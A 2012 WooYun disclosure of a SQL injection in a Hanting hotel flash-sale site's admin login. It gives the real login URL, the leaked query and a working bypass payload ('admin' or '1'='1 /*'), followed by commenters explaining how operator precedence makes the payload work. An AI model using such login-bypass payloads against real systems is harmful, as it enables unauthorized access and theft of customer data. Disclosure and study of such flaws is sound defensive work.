当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05156

漏洞标题:汉庭连锁酒店后台SQL注入

相关厂商:汉庭连锁酒店

漏洞作者: only_guest

提交时间:2012-03-10 10:10

修复时间:2012-04-24 10:11

公开时间:2012-04-24 10:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.

详细说明:

问题发生在这个站点.http://miaosha.htinns.com/
标题内没有写具体信息.因为怕发布后被人入侵.
后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php
帐号输入admin'
登陆后提示如下图


爆出了查询语句.

Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'


重点在这里
select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'
然后构造绕过
使用帐号admin' or '1'='1 /*
成功绕过登陆后台,截图如下


拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.
也可以发布秒杀信息,造成汉庭信任公关危机...
无意冒犯.我也是汉庭常客.喜欢你们的服务态度.就是网速太慢了.
啥时候能提升下网速呢?

漏洞证明:


修复方案:

过滤各种提交.

版权声明:转载请注明来源 only_guest@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2012-04-24 13:03 | Pnig0s ( 实习白帽子 | Rank:46 漏洞数:2 | The quiter you are,the more you're able ...)

    ....竟然拒绝了?

  2. 2012-04-24 15:59 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    这里使用admin' or '1'='1' /*,为啥绕不过去?求指点。。

  3. 2012-04-25 13:02 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    缺陷关联: WooYun: 搜狐分站存在严重注射漏洞.可以拿下很多分站服务器数据

  4. 2012-04-25 13:47 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @horseluke 神牛。。能解答下我的问题不。。这个地方注释有点不懂。。

  5. 2012-04-25 13:53 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @pfdz 这个万能密码现在还可以登录啊,咋不成了?

  6. 2012-04-25 14:01 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @horseluke 我是说admin' or '1'='1' /*这个不行。。。多了一个'号就不行了?这个是什么原因?

  7. 2012-04-25 14:26 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @pfdz (1)原SQL注入语句是这样的:select * from users_admin where userid='【输入字符串1】' and pwd='【输入字符串2】'。(2)你那个的话就变成了:select * from users_admin where userid='admin' or '1'='1' /*' and pwd='123'。成为了一个存在错误注释的SQL。(3)洞主所使用的万能密码并非是注释掉后面的SQL运算,似乎是利用了操作符优先级关系:select * from users_admin where userid='admin' or '1'='1 /*' and pwd='123'。(http://dev.mysql.com/doc/refman/5.1/zh/functions.html#operator-precedence )。有点神奇啊,同求解释...

  8. 2012-04-25 14:40 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @horseluke 恩,我也看到这个语句了,关注了好几天了,一直没有人来看啊,召唤@xss,求解释。。

  9. 2012-04-25 14:42 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @xss 这样召唤?

  10. 2012-04-25 14:43 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    招错了。再次召唤@xsser @only_guest

  11. 2012-04-25 14:55 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @pfdz 用搜索引擎再度搜索“MYSQL AND OR 优先级”,然后本机用EXPLAIN EXTENDED + SHOW WARNINGS试验,发现确实是优先级问题,因为and高于or,所以select * from users_admin where userid='admin' or '1'='1 /*' and pwd='123'就会变成select * from users_admin where userid='admin' or ('1'='1 /*' and pwd='123')。参考:(1)http://www.2cto.com/database/201203/122589.html (2)http://bbs.chinaunix.net/thread-1046414-1-1.html。

  12. 2012-04-25 15:17 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @horseluke 那为啥多了一个'号就不行了?/*是注释的开始吧?不是很懂,求通俗。。

  13. 2012-04-25 15:18 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    还是说这地方的/*不是注释的作用了?因为在'号里面?

  14. 2012-04-25 15:32 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @pfdz 2012-04-25 14:26的这个已经回答了你啊:“(2)你那个的话就变成了:select * from users_admin where userid='admin' or '1'='1' /*' and pwd='123'。成为了一个存在错误注释的SQL。”,完整的注释符一定要是这样子的:/**/,单行注释是“-- ”

  15. 2012-04-25 15:36 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @pfdz 对,洞主的/*其实并没有起到注释的意义

  16. 2012-04-25 15:48 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @horseluke 恩,懂了~多谢神牛。。膜拜下。。

  17. 2012-04-25 23:43 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    各种真相帝.我只是习惯性的注释....哈哈`让你们想多了

  18. 2012-06-21 14:31 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    @horseluke 有时/* # !-- 不顶用的时候 对于不支持多语句的 ;也是个不错的解决方案

  19. 2013-03-02 13:10 | botak ( 路人 | Rank:9 漏洞数:6 | 只为xsser邀请码)

    @only_guest 我觉得也是,估计楼主只是想在密码里,也加上个*/这样如果密码不先进行加密或变换的话,就能达到/*中间过程语句*/按报错图片来看。输入正确的帐号如admin ,万能密码就是admin' or '1'='1 over顺便求告知如何在dede的plus/search.php漏洞exp列库。